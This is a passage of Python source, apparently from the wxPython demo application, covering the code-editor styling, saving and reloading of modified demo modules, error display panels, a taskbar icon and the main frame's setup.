'fore:#000000,back:#FFFFFF,face:Courier New')
elif wx.Platform == '__WXMAC__':
# TODO: if this looks fine on Linux too, remove the Mac-specific case
# and use this whenever OS != MSW.
self.StyleSetSpec(stc.STC_STYLE_DEFAULT,
'fore:#000000,back:#FFFFFF,face:Monaco')
else:
defsize = wx.SystemSettings.GetFont(wx.SYS_ANSI_FIXED_FONT).GetPointSize()
self.StyleSetSpec(stc.STC_STYLE_DEFAULT,
'fore:#000000,back:#FFFFFF,face:Courier,size:%d'%defsize)
# Clear styles and revert to default.
self.StyleClearAll()
# Following style specs only indicate differences from default.
# The rest remains unchanged.
# Line numbers in margin
self.StyleSetSpec(wx.stc.STC_STYLE_LINENUMBER,'fore:#000000,back:#99A9C2')
# Highlighted brace
self.StyleSetSpec(wx.stc.STC_STYLE_BRACELIGHT,'fore:#00009D,back:#FFFF00')
# Unmatched brace
self.StyleSetSpec(wx.stc.STC_STYLE_BRACEBAD,'fore:#00009D,back:#FF0000')
# Indentation guide
self.StyleSetSpec(wx.stc.STC_STYLE_INDENTGUIDE, "fore:#CDCDCD")
# Python styles
self.StyleSetSpec(wx.stc.STC_P_DEFAULT, 'fore:#000000')
# Comments
self.StyleSetSpec(wx.stc.STC_P_COMMENTLINE, 'fore:#008000,back:#F0FFF0')
self.StyleSetSpec(wx.stc.STC_P_COMMENTBLOCK, 'fore:#008000,back:#F0FFF0')
# Numbers
self.StyleSetSpec(wx.stc.STC_P_NUMBER, 'fore:#008080')
# Strings and characters
self.StyleSetSpec(wx.stc.STC_P_STRING, 'fore:#800080')
self.StyleSetSpec(wx.stc.STC_P_CHARACTER, 'fore:#800080')
# Keywords
self.StyleSetSpec(wx.stc.STC_P_WORD, 'fore:#000080,bold')
# Triple quotes
self.StyleSetSpec(wx.stc.STC_P_TRIPLE, 'fore:#800080,back:#FFFFEA')
self.StyleSetSpec(wx.stc.STC_P_TRIPLEDOUBLE, 'fore:#800080,back:#FFFFEA')
# Class names
self.StyleSetSpec(wx.stc.STC_P_CLASSNAME, 'fore:#0000FF,bold')
# Function names
self.StyleSetSpec(wx.stc.STC_P_DEFNAME, 'fore:#008080,bold')
# Operators
self.StyleSetSpec(wx.stc.STC_P_OPERATOR, 'fore:#800000,bold')
# Identifiers. I leave this as not bold because everything seems
# to be an identifier if it doesn't match the above criteria
self.StyleSetSpec(wx.stc.STC_P_IDENTIFIER, 'fore:#000000')
# Caret color
self.SetCaretForeground("BLUE")
# Selection background
self.SetSelBackground(1, '#66CCFF')
self.SetSelBackground(True, wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT))
self.SetSelForeground(True, wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHTTEXT))
def RegisterModifiedEvent(self, eventHandler):
self.Bind(wx.stc.EVT_STC_CHANGE, eventHandler)
except ImportError:
class DemoCodeEditor(wx.TextCtrl):
def __init__(self, parent):
wx.TextCtrl.__init__(self, parent, -1, style =
wx.TE_MULTILINE | wx.HSCROLL | wx.TE_RICH2 | wx.TE_NOHIDESEL)
def RegisterModifiedEvent(self, eventHandler):
self.Bind(wx.EVT_TEXT, eventHandler)
def SetReadOnly(self, flag):
self.SetEditable(not flag)
# NOTE: STC already has this method
def GetText(self):
return self.GetValue()
def GetPositionFromLine(self, line):
return self.XYToPosition(0,line)
def GotoLine(self, line):
pos = self.GetPositionFromLine(line)
self.SetInsertionPoint(pos)
self.ShowPosition(pos)
def SelectLine(self, line):
start = self.GetPositionFromLine(line)
end = start + self.GetLineLength(line)
self.SetSelection(start, end)
#---------------------------------------------------------------------------
# Constants for module versions
modOriginal = 0
modModified = 1
modDefault = modOriginal
#---------------------------------------------------------------------------
class DemoCodePanel(wx.Panel):
"""Panel for the 'Demo Code' tab"""
def __init__(self, parent, mainFrame):
wx.Panel.__init__(self, parent, size=(1,1))
if 'wxMSW' in wx.PlatformInfo:
self.Hide()
self.mainFrame = mainFrame
self.editor = DemoCodeEditor(self)
self.editor.RegisterModifiedEvent(self.OnCodeModified)
self.btnSave = wx.Button(self, -1, "Save Changes")
self.btnRestore = wx.Button(self, -1, "Delete Modified")
self.btnSave.Enable(False)
self.btnSave.Bind(wx.EVT_BUTTON, self.OnSave)
self.btnRestore.Bind(wx.EVT_BUTTON, self.OnRestore)
self.radioButtons = { modOriginal: wx.RadioButton(self, -1, "Original", style = wx.RB_GROUP),
modModified: wx.RadioButton(self, -1, "Modified") }
self.controlBox = wx.BoxSizer(wx.HORIZONTAL)
self.controlBox.Add(wx.StaticText(self, -1, "Active Version:"), 0,
wx.RIGHT | wx.LEFT | wx.ALIGN_CENTER_VERTICAL, 5)
for modID, radioButton in self.radioButtons.items():
self.controlBox.Add(radioButton, 0, wx.EXPAND | wx.RIGHT, 5)
radioButton.modID = modID # makes it easier for the event handler
radioButton.Bind(wx.EVT_RADIOBUTTON, self.OnRadioButton)
self.controlBox.Add(self.btnSave, 0, wx.RIGHT, 5)
self.controlBox.Add(self.btnRestore, 0)
self.box = wx.BoxSizer(wx.VERTICAL)
self.box.Add(self.controlBox, 0, wx.EXPAND)
self.box.Add(wx.StaticLine(self), 0, wx.EXPAND)
self.box.Add(self.editor, 1, wx.EXPAND)
self.box.Fit(self)
self.SetSizer(self.box)
# Loads a demo from a DemoModules object
def LoadDemo(self, demoModules):
self.demoModules = demoModules
if (modDefault == modModified) and demoModules.Exists(modModified):
demoModules.SetActive(modModified)
else:
demoModules.SetActive(modOriginal)
self.radioButtons[demoModules.GetActiveID()].Enable(True)
self.ActiveModuleChanged()
def ActiveModuleChanged(self):
self.LoadDemoSource(self.demoModules.GetSource())
self.UpdateControlState()
self.mainFrame.pnl.Freeze()
self.ReloadDemo()
self.mainFrame.pnl.Thaw()
def LoadDemoSource(self, source):
self.editor.Clear()
self.editor.SetValue(source)
self.JumpToLine(0)
self.btnSave.Enable(False)
def JumpToLine(self, line, highlight=False):
self.editor.GotoLine(line)
self.editor.SetFocus()
if highlight:
self.editor.SelectLine(line)
def UpdateControlState(self):
active = self.demoModules.GetActiveID()
# Update the radio/restore buttons
for moduleID in self.radioButtons:
btn = self.radioButtons[moduleID]
if moduleID == active:
btn.SetValue(True)
else:
btn.SetValue(False)
if self.demoModules.Exists(moduleID):
btn.Enable(True)
if moduleID == modModified:
self.btnRestore.Enable(True)
else:
btn.Enable(False)
if moduleID == modModified:
self.btnRestore.Enable(False)
def OnRadioButton(self, event):
radioSelected = event.GetEventObject()
modSelected = radioSelected.modID
if modSelected != self.demoModules.GetActiveID():
busy = wx.BusyInfo("Reloading demo module...")
self.demoModules.SetActive(modSelected)
self.ActiveModuleChanged()
def ReloadDemo(self):
if self.demoModules.name != __name__:
self.mainFrame.RunModule()
def OnCodeModified(self, event):
self.btnSave.Enable(self.editor.IsModified())
def OnSave(self, event):
if self.demoModules.Exists(modModified):
if self.demoModules.GetActiveID() == modOriginal:
overwriteMsg = "You are about to overwrite an already existing modified copy\n" + \
"Do you want to continue?"
dlg = wx.MessageDialog(self, overwriteMsg, "wxPython Demo",
wx.YES_NO | wx.NO_DEFAULT| wx.ICON_EXCLAMATION)
result = dlg.ShowModal()
if result == wx.ID_NO:
return
dlg.Destroy()
self.demoModules.SetActive(modModified)
modifiedFilename = GetModifiedFilename(self.demoModules.name)
# Create the demo directory if one doesn't already exist
if not os.path.exists(GetModifiedDirectory()):
try:
os.makedirs(GetModifiedDirectory())
if not os.path.exists(GetModifiedDirectory()):
wx.LogMessage("BUG: Created demo directory but it still doesn't exist")
raise AssertionError
except:
wx.LogMessage("Error creating demo directory: %s" % GetModifiedDirectory())
return
else:
wx.LogMessage("Created directory for modified demos: %s" % GetModifiedDirectory())
# Save
f = open(modifiedFilename, "wt")
source = self.editor.GetText()
try:
f.write(source)
finally:
f.close()
busy = wx.BusyInfo("Reloading demo module...")
self.demoModules.LoadFromFile(modModified, modifiedFilename)
self.ActiveModuleChanged()
self.mainFrame.SetTreeModified(True)
def OnRestore(self, event): # Handles the "Delete Modified" button
modifiedFilename = GetModifiedFilename(self.demoModules.name)
self.demoModules.Delete(modModified)
os.unlink(modifiedFilename) # Delete the modified copy
busy = wx.BusyInfo("Reloading demo module...")
self.ActiveModuleChanged()
self.mainFrame.SetTreeModified(False)
#---------------------------------------------------------------------------
def opj(path):
"""Convert paths to the platform-specific separator"""
st = os.path.join(*tuple(path.split('/')))
# HACK: on Linux, a leading / gets lost...
if path.startswith('/'):
st = '/' + st
return st
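# Illustrative: on Windows, opj('bitmaps/image.png') -> 'bitmaps\\image.png';
# on POSIX systems the path comes back unchanged.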
def GetDataDir():
"""
Return the standard location on this platform for application data
"""
sp = wx.StandardPaths.Get()
return sp.GetUserDataDir()
def GetModifiedDirectory():
"""
Returns the directory where modified versions of the demo files
are stored
"""
return os.path.join(GetDataDir(), "modified")
def GetModifiedFilename(name):
"""
Returns the filename of the modified version of the specified demo
"""
if not name.endswith(".py"):
name = name + ".py"
return os.path.join(GetModifiedDirectory(), name)
def GetOriginalFilename(name):
"""
Returns the filename of the original version of the specified demo
"""
if not name.endswith(".py"):
name = name + ".py"
if os.path.isfile(name):
return name
originalDir = os.getcwd()
listDir = os.listdir(originalDir)
# Loop over the content of the demo directory
for item in listDir:
if not os.path.isdir(item):
# Not a directory, continue
continue
dirFile = os.listdir(item)
# See if a file called "name" is there
if name in dirFile:
return os.path.join(item, name)
# We must return a string...
return ""
def DoesModifiedExist(name):
    """Returns whether the specified demo has a modified copy"""
    return os.path.exists(GetModifiedFilename(name))
def GetConfig():
if not os.path.exists(GetDataDir()):
os.makedirs(GetDataDir())
config = wx.FileConfig(
localFilename=os.path.join(GetDataDir(), "options"))
return config
def MakeDocDirs():
docDir = os.path.join(GetDataDir(), "docs")
if not os.path.exists(docDir):
os.makedirs(docDir)
for plat in _platformNames:
imageDir = os.path.join(docDir, "images", plat)
if not os.path.exists(imageDir):
os.makedirs(imageDir)
def GetDocFile():
docFile = os.path.join(GetDataDir(), "docs", "TrunkDocs.pkl")
return docFile
def GetDocImagesDir():
MakeDocDirs()
return os.path.join(GetDataDir(), "docs", "images")
def SearchDemo(name, keyword):
""" Returns whether a demo contains the search keyword or not. """
fid = open(GetOriginalFilename(name), "rt")
fullText = fid.read()
fid.close()
if six.PY2:
    # On py3 the "rt" read above already returns str
    fullText = fullText.decode("iso-8859-1")
if fullText.find(keyword) >= 0:
return True
return False
def HuntExternalDemos():
"""
Searches for external demos (i.e. packages like AGW) in the wxPython
demo sub-directories. In order to be found, these external packages
must have a __demo__.py file in their directory.
"""
externalDemos = {}
originalDir = os.getcwd()
listDir = os.listdir(originalDir)
# Loop over the content of the demo directory
for item in listDir:
if not os.path.isdir(item):
# Not a directory, continue
continue
dirFile = os.listdir(item)
# See if a __demo__.py file is there
if "__demo__.py" in dirFile:
# Extend sys.path and import the external demos
sys.path.append(item)
externalDemos[item] = __import__("__demo__")
if not externalDemos:
# Nothing to import...
return {}
# Modify the tree items and icons
index = 0
for category, demos in _treeList:
# We put the external packages right before the
# More Windows/Controls item
if category == "More Windows/Controls":
break
index += 1
# Sort and reverse the external demos keys so that they
# come back in alphabetical order
keys = list(externalDemos.keys())
keys.sort()
keys.reverse()
# Loop over all external packages
for extern in keys:
package = externalDemos[extern]
# Insert a new package in the _treeList of demos
_treeList.insert(index, package.GetDemos())
# Get the recent additions for this package
_treeList[0][1].extend(package.GetRecentAdditions())
# Extend the demo bitmaps and the catalog
_demoPngs.insert(index+1, extern)
images.catalog[extern] = package.GetDemoBitmap()
# That's all folks...
return externalDemos
def LookForExternals(externalDemos, demoName):
"""
Checks if a demo name is in any of the external packages (like AGW) or
if the user clicked on one of the external packages parent items in the
tree, in which case it returns the html overview for the package.
"""
pkg = overview = None
# Loop over all the external demos
for key, package in externalDemos.items():
# Get the tree item name for the package and its demos
treeName, treeDemos = package.GetDemos()
# Get the overview for the package
treeOverview = package.GetOverview()
if treeName == demoName:
# The user clicked on the parent tree item, return the overview
return pkg, treeOverview
elif demoName in treeDemos:
# The user clicked on a real demo, return the package
return key, overview
# No match found, return None for both
return pkg, overview
#---------------------------------------------------------------------------
class ModuleDictWrapper(object):
"""Emulates a module with a dynamically compiled __dict__"""
def __init__(self, dict):
self.dict = dict
def __getattr__(self, name):
if name in self.dict:
return self.dict[name]
else:
raise AttributeError
class DemoModules(object):
"""
Dynamically manages the original/modified versions of a demo
module
"""
def __init__(self, name):
self.modActive = -1
self.name = name
# (dict , source , filename , description , error information )
# ( 0 , 1 , 2 , 3 , 4 )
self.modules = [[dict(), "" , "" , "<original>" , None],
[dict(), "" , "" , "<modified>" , None]]
getcwd = os.getcwd if six.PY3 else os.getcwdu
for i in [modOriginal, modModified]:
self.modules[i][0]['__file__'] = \
os.path.join(getcwd(), GetOriginalFilename(name))
# load original module
self.LoadFromFile(modOriginal, GetOriginalFilename(name))
self.SetActive(modOriginal)
# load modified module (if one exists)
if DoesModifiedExist(name):
self.LoadFromFile(modModified, GetModifiedFilename(name))
def LoadFromFile(self, modID, filename):
self.modules[modID][2] = filename
file = open(filename, "rt")
self.LoadFromSource(modID, file.read())
file.close()
def LoadFromSource(self, modID, source):
self.modules[modID][1] = source
self.LoadDict(modID)
def LoadDict(self, modID):
if self.name != __name__:
source = self.modules[modID][1]
description = self.modules[modID][2]
if six.PY2:
description = description.encode(sys.getfilesystemencoding())
try:
code = compile(source, description, "exec")
exec_(code, self.modules[modID][0])
except:
self.modules[modID][4] = DemoError(sys.exc_info())
self.modules[modID][0] = None
else:
self.modules[modID][4] = None
def SetActive(self, modID):
if modID != modOriginal and modID != modModified:
raise LookupError
else:
self.modActive = modID
def GetActive(self):
dict = self.modules[self.modActive][0]
if dict is None:
return None
else:
return ModuleDictWrapper(dict)
def GetActiveID(self):
return self.modActive
def GetSource(self, modID = None):
if modID is None:
modID = self.modActive
return self.modules[modID][1]
def GetFilename(self, modID = None):
if modID is None:
modID = self.modActive
        return self.modules[modID][2]
def GetErrorInfo(self, modID = None):
if modID is None:
modID = self.modActive
        return self.modules[modID][4]
def Exists(self, modID):
return self.modules[modID][1] != ""
def UpdateFile(self, modID = None):
"""Updates the file from which a module was loaded
with (possibly updated) source"""
if modID is None:
modID = self.modActive
source = self.modules[modID][1]
filename = self.modules[modID][2]
        with open(filename, "wt") as file:
            file.write(source)
def Delete(self, modID):
if self.modActive == modID:
self.SetActive(0)
self.modules[modID][0] = None
self.modules[modID][1] = ""
self.modules[modID][2] = ""
#---------------------------------------------------------------------------
class DemoError(object):
"""Wraps and stores information about the current exception"""
def __init__(self, exc_info):
import copy
excType, excValue = exc_info[:2]
# traceback list entries: (filename, line number, function name, text)
self.traceback = traceback.extract_tb(exc_info[2])
# --Based on traceback.py::format_exception_only()--
if isinstance(excType, type):
self.exception_type = excType.__name__
else:
self.exception_type = excType
# If it's a syntax error, extra information needs
# to be added to the traceback
if excType is SyntaxError:
try:
msg, (filename, lineno, self.offset, line) = excValue
except:
pass
else:
if not filename:
filename = "<string>"
line = line.strip()
self.traceback.append( (filename, lineno, "", line) )
excValue = msg
try:
self.exception_details = str(excValue)
except:
self.exception_details = "<unprintable %s object>" & type(excValue).__name__
del exc_info
def __str__(self):
ret = "Type %s \n \
Traceback: %s \n \
Details : %s" % ( str(self.exception_type), str(self.traceback), self.exception_details )
return ret
#---------------------------------------------------------------------------
class DemoErrorPanel(wx.Panel):
"""Panel put into the demo tab when the demo fails to run due to errors"""
def __init__(self, parent, codePanel, demoError, log):
wx.Panel.__init__(self, parent, -1)#, style=wx.NO_FULL_REPAINT_ON_RESIZE)
self.codePanel = codePanel
self.nb = parent
self.log = log
self.box = wx.BoxSizer(wx.VERTICAL)
# Main Label
self.box.Add(wx.StaticText(self, -1, "An error has occurred while trying to run the demo")
, 0, wx.ALIGN_CENTER | wx.TOP, 10)
# Exception Information
boxInfo = wx.StaticBox(self, -1, "Exception Info" )
boxInfoSizer = wx.StaticBoxSizer(boxInfo, wx.VERTICAL ) # Used to center the grid within the box
boxInfoGrid = wx.FlexGridSizer( cols=2 )
textFlags = wx.ALIGN_RIGHT | wx.LEFT | wx.RIGHT | wx.TOP
boxInfoGrid.Add(wx.StaticText(self, -1, "Type: "), 0, textFlags, 5 )
boxInfoGrid.Add(wx.StaticText(self, -1, str(demoError.exception_type)) , 0, textFlags, 5 )
boxInfoGrid.Add(wx.StaticText(self, -1, "Details: ") , 0, textFlags, 5 )
boxInfoGrid.Add(wx.StaticText(self, -1, demoError.exception_details) , 0, textFlags, 5 )
boxInfoSizer.Add(boxInfoGrid, 0, wx.ALIGN_CENTRE | wx.ALL, 5 )
self.box.Add(boxInfoSizer, 0, wx.ALIGN_CENTER | wx.ALL, 5)
# Set up the traceback list
# This one automatically resizes last column to take up remaining space
from ListCtrl import TestListCtrl
self.list = TestListCtrl(self, -1, style=wx.LC_REPORT | wx.SUNKEN_BORDER)
self.list.Bind(wx.EVT_LEFT_DCLICK, self.OnDoubleClick)
self.list.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnItemSelected)
self.list.InsertColumn(0, "Filename")
self.list.InsertColumn(1, "Line", wx.LIST_FORMAT_RIGHT)
self.list.InsertColumn(2, "Function")
self.list.InsertColumn(3, "Code")
self.InsertTraceback(self.list, demoError.traceback)
self.list.SetColumnWidth(0, wx.LIST_AUTOSIZE)
self.list.SetColumnWidth(2, wx.LIST_AUTOSIZE)
self.box.Add(wx.StaticText(self, -1, "Traceback:")
, 0, wx.ALIGN_CENTER | wx.TOP, 5)
self.box.Add(self.list, 1, wx.GROW | wx.ALIGN_CENTER | wx.ALL, 5)
self.box.Add(wx.StaticText(self, -1, "Entries from the demo module are shown in blue\n"
+ "Double-click on them to go to the offending line")
, 0, wx.ALIGN_CENTER | wx.BOTTOM, 5)
self.box.Fit(self)
self.SetSizer(self.box)
def InsertTraceback(self, list, traceback):
#Add the traceback data
for x in range(len(traceback)):
data = traceback[x]
list.InsertItem(x, os.path.basename(data[0])) # Filename
list.SetItem(x, 1, str(data[1])) # Line
list.SetItem(x, 2, str(data[2])) # Function
list.SetItem(x, 3, str(data[3])) # Code
# Check whether this entry is from the demo module
if data[0] == "<original>" or data[0] == "<modified>": # FIXME: make more generalised
self.list.SetItemData(x, int(data[1])) # Store line number for easy access
# Give it a blue colour
item = self.list.GetItem(x)
item.SetTextColour(wx.BLUE)
self.list.SetItem(item)
else:
self.list.SetItemData(x, -1) # Editor can't jump into this one's code
def OnItemSelected(self, event):
# This occurs before OnDoubleClick and can be used to set the
# currentItem. OnDoubleClick doesn't get a wxListEvent....
self.currentItem = event.Index
event.Skip()
def OnDoubleClick(self, event):
# If double-clicking on a demo's entry, jump to the line number
line = self.list.GetItemData(self.currentItem)
if line != -1:
self.nb.SetSelection(1) # Switch to the code viewer tab
wx.CallAfter(self.codePanel.JumpToLine, line-1, True)
event.Skip()
#---------------------------------------------------------------------------
class MainPanel(wx.Panel):
"""
Just a simple derived panel where we override Freeze and Thaw to work
around an issue on wxGTK.
"""
def Freeze(self):
if 'wxMSW' in wx.PlatformInfo:
return super(MainPanel, self).Freeze()
def Thaw(self):
if 'wxMSW' in wx.PlatformInfo:
return super(MainPanel, self).Thaw()
#---------------------------------------------------------------------------
class DemoTaskBarIcon(TaskBarIcon):
TBMENU_RESTORE = wx.NewId()
TBMENU_CLOSE = wx.NewId()
TBMENU_CHANGE = wx.NewId()
TBMENU_REMOVE = wx.NewId()
def __init__(self, frame):
TaskBarIcon.__init__(self, wx.adv.TBI_DOCK) # wx.adv.TBI_CUSTOM_STATUSITEM
self.frame = frame
# Set the image
icon = self.MakeIcon(images.WXPdemo.GetImage())
self.SetIcon(icon, "wxPython Demo")
self.imgidx = 1
# bind some events
self.Bind(wx.adv.EVT_TASKBAR_LEFT_DCLICK, self.OnTaskBarActivate)
self.Bind(wx.EVT_MENU, self.OnTaskBarActivate, id=self.TBMENU_RESTORE)
self.Bind(wx.EVT_MENU, self.OnTaskBarClose, id=self.TBMENU_CLOSE)
self.Bind(wx.EVT_MENU, self.OnTaskBarChange, id=self.TBMENU_CHANGE)
self.Bind(wx.EVT_MENU, self.OnTaskBarRemove, id=self.TBMENU_REMOVE)
def CreatePopupMenu(self):
"""
This method is called by the base class when it needs to popup
the menu for the default EVT_RIGHT_DOWN event. Just create
the menu how you want it and return it from this function,
the base class takes care of the rest.
"""
menu = wx.Menu()
menu.Append(self.TBMENU_RESTORE, "Restore wxPython Demo")
menu.Append(self.TBMENU_CLOSE, "Close wxPython Demo")
menu.AppendSeparator()
menu.Append(self.TBMENU_CHANGE, "Change the TB Icon")
menu.Append(self.TBMENU_REMOVE, "Remove the TB Icon")
return menu
def MakeIcon(self, img):
"""
The various platforms have different requirements for the
icon size...
"""
if "wxMSW" in wx.PlatformInfo:
img = img.Scale(16, 16)
elif "wxGTK" in wx.PlatformInfo:
img = img.Scale(22, 22)
        # wxMac can be any size up to 128x128, so leave the source img alone...
icon = wx.Icon(img.ConvertToBitmap())
return icon
def OnTaskBarActivate(self, evt):
if self.frame.IsIconized():
self.frame.Iconize(False)
if not self.frame.IsShown():
self.frame.Show(True)
self.frame.Raise()
def OnTaskBarClose(self, evt):
wx.CallAfter(self.frame.Close)
def OnTaskBarChange(self, evt):
names = [ "WXPdemo", "Mondrian", "Pencil", "Carrot" ]
name = names[self.imgidx]
eImg = getattr(images, name)
self.imgidx += 1
if self.imgidx >= len(names):
self.imgidx = 0
icon = self.MakeIcon(eImg.Image)
self.SetIcon(icon, "This is a new icon: " + name)
def OnTaskBarRemove(self, evt):
self.RemoveIcon()
#---------------------------------------------------------------------------
class wxPythonDemo(wx.Frame):
overviewText = "wxPython Overview"
def __init__(self, parent, title):
wx.Frame.__init__(self, parent, -1, title, size = (970, 720),
style=wx.DEFAULT_FRAME_STYLE | wx.NO_FULL_REPAINT_ON_RESIZE)
self.SetMinSize((640,480))
self.pnl = pnl = MainPanel(self)
self.mgr = aui.AuiManager()
self.mgr.SetManagedWindow(pnl)
self.loaded = False
self.cwd = os.getcwd()
self.curOverview = ""
self.demoPage = None
self.codePage = None
self.shell = None
self.firstTime = True
self.finddlg = None
icon = images.WXPdemo.GetIcon()
self.SetIcon(icon)
try:
self.tbicon = DemoTaskBarIcon(self)
except:
self.tbicon = None
self.otherWin = None
self.allowDocs = False
self.downloading = False
self.internetThread = None
self.downloadImage = 2
self.sendDownloadError = True
self.downloadTimer = wx.Timer(self, wx.ID_ANY)
self.Bind(wx.EVT_IDLE, self.OnIdle)
self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)
        self.Bind(wx.EVT_ICONIZE, self.OnIconify)
self.Bind(wx.EVT_MAXIMIZE, self.OnMaximize)
self.Bind(wx.EVT_TIMER, self.OnDownloadTimer, self.downloadTimer)
self.Centre(wx.BOTH)
self.statusBar = self.CreateStatusBar(2)#, wx.ST_SIZEGRIP
self.statusBar.SetStatusWidths([-2, -1])
statusText = "Welcome to wxPython %s" % wx.VERSION_STRING
self.statusBar.SetStatusText(statusText, 0)
self.downloadGauge = wx.Gauge(self.statusBar, wx.ID_ANY, 50)
self.downloadGauge.SetToolTip("Downloading Docs...")
self.downloadGauge.Hide()
self.sizeChanged = False
self.Reposition()
self.statusBar.Bind(wx.EVT_SIZE, self.OnStatusBarSize)
self.statusBar.Bind(wx.EVT_IDLE, self.OnStatusBarIdle)
self.dying = False
self.skipLoad = False
self.allowAuiFloating = False
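        # No-op handler bound below to wx.EVT_ERASE_BACKGROUND on the overview
        # panel, presumably to reduce flicker by swallowing erase events.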
def EmptyHandler(evt): pass
self.ReadConfigurationFile()
self.externalDemos = HuntExternalDemos()
# Create a Notebook
self.nb = wx.Notebook(pnl, -1, style=wx.CLIP_CHILDREN)
if 'wxMac' not in wx.PlatformInfo:
imgList = wx.ImageList(16, 16)
for png in ["overview", "code", "demo"]:
bmp = images.catalog[png].GetBitmap()
imgList.Add(bmp)
for indx in range(9):
bmp = images.catalog["spinning_nb%d"%indx].GetBitmap()
imgList.Add(bmp)
self.nb.AssignImageList(imgList)
self.BuildMenuBar()
self.finddata = wx.FindReplaceData()
self.finddata.SetFlags(wx.FR_DOWN)
# Create a TreeCtrl
leftPanel = wx.Panel(pnl, style=wx.TAB_TRAVERSAL|wx.CLIP_CHILDREN)
self.treeMap = {}
self.searchItems = {}
self.tree = wxPythonDemoTree(leftPanel)
self.filter = wx.SearchCtrl(leftPanel, style=wx.TE_PROCESS_ENTER)
self.filter.ShowCancelButton(True)
self.filter.Bind(wx.EVT_TEXT, self.RecreateTree)
self.filter.Bind(wx.EVT_SEARCHCTRL_CANCEL_BTN,
lambda e: self.filter.SetValue(''))
self.filter.Bind(wx.EVT_TEXT_ENTER, self.OnSearch)
searchMenu = wx.Menu()
item = searchMenu.AppendRadioItem(-1, "Sample Name")
self.Bind(wx.EVT_MENU, self.OnSearchMenu, item)
item = searchMenu.AppendRadioItem(-1, "Sample Content")
self.Bind(wx.EVT_MENU, self.OnSearchMenu, item)
self.filter.SetMenu(searchMenu)
self.RecreateTree()
self.tree.SetExpansionState(self.expansionState)
self.tree.Bind(wx.EVT_TREE_ITEM_EXPANDED, self.OnItemExpanded)
self.tree.Bind(wx.EVT_TREE_ITEM_COLLAPSED, self.OnItemCollapsed)
self.tree.Bind(wx.EVT_TREE_SEL_CHANGED, self.OnSelChanged)
self.tree.Bind(wx.EVT_LEFT_DOWN, self.OnTreeLeftDown)
# Set up a wx.html.HtmlWindow on the Overview Notebook page
# we put it in a panel first because there seems to be a
# refresh bug of some sort (wxGTK) when it is directly in
# the notebook...
if 0: # the old way
self.ovr = wx.html.HtmlWindow(self.nb, -1, size=(400, 400))
self.nb.AddPage(self.ovr, self.overviewText, imageId=0)
else: # hopefully I can remove this hacky code soon, see SF bug #216861
panel = wx.Panel(self.nb, -1, style=wx.CLIP_CHILDREN)
self.ovr = wx.html.HtmlWindow(panel, -1, size=(400, 400))
self.nb.AddPage(panel, self.overviewText, imageId=0)
def OnOvrSize(evt, ovr=self.ovr):
ovr.SetSize(evt.GetSize())
panel.Bind(wx.EVT_SIZE, OnOvrSize)
panel.Bind(wx.EVT_ERASE_BACKGROUND, EmptyHandler)
if "gtk2" in wx.PlatformInfo or "gtk3" in wx.PlatformInfo:
self.ovr.SetStandardFonts()
self.SetOverview(self.overviewText, mainOverview)
# Set up a log window
self.log = wx.TextCtrl(pnl, -1,
style = wx.TE_MULTILINE|wx.TE_READONLY|wx.HSCROLL)
if wx.Platform == "__WXMAC__":
self.log.MacCheckSpelling(False)
# Set the wxWindows log target to be this textctrl
#wx.Log.SetActiveTarget(wx.LogTextCtrl(self.log))
# But instead of the above we want to show how to use our own wx.Log class
wx.Log.SetActiveTarget(MyLog(self.log))
# for serious debugging
#wx.Log.SetActiveTarget(wx.LogStderr())
#wx.Log.SetTraceMask(wx.TraceMessages)
self.Bind(wx.EVT_ACTIVATE, self.OnActivate)
wx.GetApp().Bind(wx.EVT_ACTIVATE_APP, self.OnAppActivate)
# add the windows to the splitter and split it.
leftBox = wx.BoxSizer(wx.VERTICAL)
leftBox.Add(self.tree, 1, wx.EXPAND)
leftBox.Add(wx.StaticText(leftPanel, label = "Filter Demos:"), 0, wx.TOP|wx.LEFT, 5)
leftBox.Add(self.filter, 0, wx.EXPAND|wx.ALL, 5)
if 'wxMac' in wx.PlatformInfo:
leftBox.Add((5,5)) # Make sure there is room for the focus ring
leftPanel.SetSizer(leftBox)
# select initial items
self.nb.SetSelection(0)
self.tree.SelectItem(self.root)
# Load 'Main' module
self.LoadDemo(self.overviewText)
self.loaded = True
# select some other initial module?
if len(sys.argv) > 1:
arg = sys.argv[1]
if arg.endswith('.py'):
arg = arg[:-3]
selectedDemo = self.treeMap.get(arg, None)
if selectedDemo:
self.tree.SelectItem(selectedDemo)
self.tree.EnsureVisible(selectedDemo)
# Use the aui manager to set up everything
self.mgr.AddPane(self.nb, aui.AuiPaneInfo().CenterPane().Name("Notebook"))
self.mgr.AddPane(leftPanel,
aui.AuiPaneInfo().
Left().Layer(2).BestSize((240, -1)).
MinSize((240, -1)).
Floatable(self.allowAuiFloating).FloatingSize((240, 700)).
Caption("wxPython Demos").
CloseButton(False).
Name("DemoTree"))
self.mgr.AddPane(self.log,
aui.AuiPaneInfo().
Bottom().BestSize((-1, 150)).
MinSize((-1, 140)).
Floatable(self.allowAuiFloating).FloatingSize((500, 160)).
Caption("Demo Log Messages").
CloseButton(False).
Name("LogWindow"))
self.auiConfigurations[DEFAULT_PERSPECTIVE] = self.mgr.SavePerspective()
self.mgr.Update()
self.mgr.SetAGWFlags(self.mgr.GetAGWFlags() ^ aui.AUI_MGR_TRANSPARENT_DRAG)
def ReadConfigurationFile(self):
self.auiConfigurations = {}
self.expansionState = [0, 1]
config = GetConfig()
val = config.Read('ExpansionState')
if val:
self.expansionState = eval(val)
val = config.Read('AUIPerspectives')
if val:
self.auiConfigurations = eval(val)
val = config.Read('AllowDownloads')
if val:
self.allowDocs = eval(val)
val = config.Read('AllowAUIFloating')
if val:
self.allowAuiFloating = eval(val)
MakeDocDirs()
pickledFile = GetDocFile()
if not os.path.isfile(pickledFile):
self.pickledData = {}
return
fid = open(pickledFile, "rb")
try:
self.pickledData = cPickle.load(fid)
except:
self.pickledData = {}
fid.close()
def BuildMenuBar(self):
# Make a File menu
self.mainmenu = wx.MenuBar()
menu = wx.Menu()
item = menu.Append(-1, '&Redirect Output',
'Redirect print statements to a window',
wx.ITEM_CHECK)
self.Bind(wx.EVT_MENU, self.OnToggleRedirect, item)
wx.App.SetMacExitMenuItemId(9123)
exitItem = wx.MenuItem(menu, 9123, 'E&xit\tCtrl-Q', 'Get the heck outta here!')
exitItem.SetBitmap(images.catalog['exit'].GetBitmap())
menu.Append(exitItem)
